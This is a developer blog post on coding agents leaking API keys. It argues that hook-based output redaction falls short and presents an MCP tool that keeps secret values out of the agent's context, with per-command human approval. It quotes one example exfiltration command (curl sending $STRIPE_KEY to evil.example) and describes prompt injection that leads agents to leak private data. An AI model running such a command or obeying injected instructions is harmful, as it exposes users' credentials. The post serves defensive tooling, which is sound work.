Claude Code keeps printing my secrets: why hook redaction isn't enough
2026-10-10 · originally published on DEV
If you use Claude Code (or any coding agent) against real APIs, you have
probably watched it do this: you ask it to call Stripe, it runs env or
cat .env to “check the configuration”, and your live key scrolls past in
the transcript.
You’re not alone. The Claude Code issue tracker has a run of reports with the same shape:
- the agent keeps printing env-var secrets verbatim instead of referring to them by name, to the point where the reporter kept rotating keys (#56103);
- the model inlines secret values directly into Bash tool-call arguments (#56025);
- three leak incidents in six days, with a request for harness-level output redaction (#65122);
- vanilla Claude Code reading credential files into the conversation (#66044).
Most of these are closed and locked, so if you landed here from a search, this post is the reply I couldn’t leave on them.
Why this matters more than “oops, it’s in my scrollback”
A secret that reaches the model’s context can leave through every channel the agent has: a reply, generated code that gets committed, a URL in a tool call, request logs, observability tools that store full prompts, a shared session transcript.
And agents spend all day reading untrusted input: issues, READMEs, web pages, other MCP servers’ results. Prompt injection turns that into an exfiltration path. Invariant Labs showed a single malicious GitHub issue making an agent leak private-repo data, and EchoLeak (CVE-2025-32711) was a zero-click exfiltration in M365 Copilot. Models are trained to resist this. Nobody claims the failure rate is zero, and a leaked key only has to leak once.
The community fix: redact the output with hooks
The common workaround is a PostToolUse hook that rewrites tool output and
masks anything that looks like a key. It helps, but it has three structural
problems.
1. It runs after the fact. By the time a hook sees the output, the value
is already in the agent’s process environment and the agent can use it.
Redacting the transcript does nothing about curl "https://evil.example/?k=$STRIPE_KEY":
the model never needed to see the value to send it.
2. It can’t catch what never hits output. When the model inlines a secret into a tool-call argument (#56025), the leak happens on the way in, before any output hook runs.
3. Format blocklists miss formats. Most redaction matches patterns that
“look like” credentials: sk-..., ghp_..., AKIA.... Every provider invents
a new prefix, and a blocklist only knows the ones someone wrote down. There are
also plumbing traps: a reported bug where output rewriting is silently ignored
for the built-in Bash tool
(#68951).
Hooks treat the symptom. The cause is that the value is somewhere the agent can reach.
The architectural fix: names for the model, values for the process
Your shell has offered the right split for fifty years:
model context: STRIPE_KEY (the name: harmless)
child process env: sk-live-... (the value: injected at exec time)
The model writes curl -H "Authorization: Bearer $STRIPE_KEY" ... and never
learns what the variable expands to. The trick is making sure the value is
not in the agent’s own environment, only in the one child process that needs
it.
I built keygrant to make that split the default:

It’s an MCP server with exactly two tools:
list_secretsreturns names and descriptions only;exec_with_secretsruns one command with the named secrets injected into that child process. The values come from the OS keystore (Keychain, DPAPI, Secret Service), never from a dotfile.
There is deliberately no tool to store a secret. If the model could write a value through a tool call, the value would be in context, and the whole design would be void. Values go in out-of-band, through stdin.
Approval, per command
Keeping values out of context still leaves problem 1: an injected agent can use a key it has never seen. Only a human can tell whether a given use is intended.
So every exec_with_secrets call pops a native OS dialog showing the session,
the secrets and the full command. An approval covers that exact command
string, in that one agent session, for 15 minutes, held in memory only. A
different command asks again; the same command repeated does not, so you don’t
get trained into clicking Allow without reading.
My first version granted “this key, this session, 15 minutes”. My own security
review killed it: approve one honest curl api.stripe.com and the malicious
curl that follows rides the same grant. Binding to the exact command fixed it.
If you’re away from the machine, an unanswered dialog can escalate to your phone. The verdict is signed by a key generated in the phone’s browser, over a hash of the full request, and the CLI verifies it against the request it actually holds. The relay server can’t approve on your behalf, or show your phone one command while releasing another.
Redaction, by value, as a second line
Output still gets redacted before it returns to the model, but by the known value of each injected secret, not by format guesses. There’s no blocklist to miss a provider’s new prefix. Plaintext, hex, URL-encoding and base64 are covered.
The bug I found in my own redaction
While writing this up I tried the obvious attack against my own tool:
keygrant exec --redact STRIPE_KEY -- \
sh -c 'echo "Authorization: Bearer $STRIPE_KEY" | base64'
The old version printed the key, encoded, in full.
Base64 encodes in 3-byte groups, so the same key encodes to completely
different characters depending on what comes before it. "Authorization: Bearer "
is 22 bytes, not a multiple of 3, which shifts the key into a different
alignment. My redaction only matched the key encoded on its own, at offset 0.
Anything in front of it, and the whole key was recoverable from the output.
The fix: encode the secret at all three alignments and match only the middle characters that depend on the key alone. The edge characters mix in a few bits of the neighbouring bytes and can’t reconstruct the key. The regression test tries to decode the key back out of redacted output at every alignment; the old code failed 92 cases. Fixed in 0.1.6:
QXV0aG9yaXphdGlvbjogQmVhcmVyIH[STRIPE_KEY:base64:REDACTED]Ao=
It’s also the best argument for the architecture. Redaction is a backstop, and backstops have holes. The boundary is the value never reaching the agent.
What this doesn’t protect against
- An approved malicious command still leaks the key. The dialog shows the
full command; reading it is the control. Per-secret egress allowlists
(
STRIPE_KEYonly toapi.stripe.com) are next. - Redaction can be evaded by encodings it doesn’t know, and a value written to a file and read back later isn’t seen by output redaction at all.
- Local malware is out of scope. Anything running as your user can read your keystore. This scopes what agents can touch; it isn’t antivirus.
Try it
uv tool install keygrant # or: pipx install keygrant (Python >= 3.10)
keygrant init # writes .mcp.json + CLAUDE.md guidance
echo "sk-..." | keygrant set STRIPE_KEY --desc "stripe, test mode"
Restart Claude Code and ask it to “list recent Stripe charges with STRIPE_KEY”.
It will write $STRIPE_KEY into the command, and you approve it in the dialog.
Or register it for every project:
claude mcp add --scope user keygrant -- keygrant mcp
No account, local only, Apache-2.0, no third-party dependencies in the core.
It’s also listed in the official MCP Registry as io.github.bazingaedward/keygrant.
- GitHub: https://github.com/bazingaedward/keygrant
- Threat model write-up: https://keygrant.app/why
If you’ve found an encoding the redaction misses, a hole in the threat model, or a platform where the dialog misbehaves, I’d genuinely like to hear it in the comments or an issue.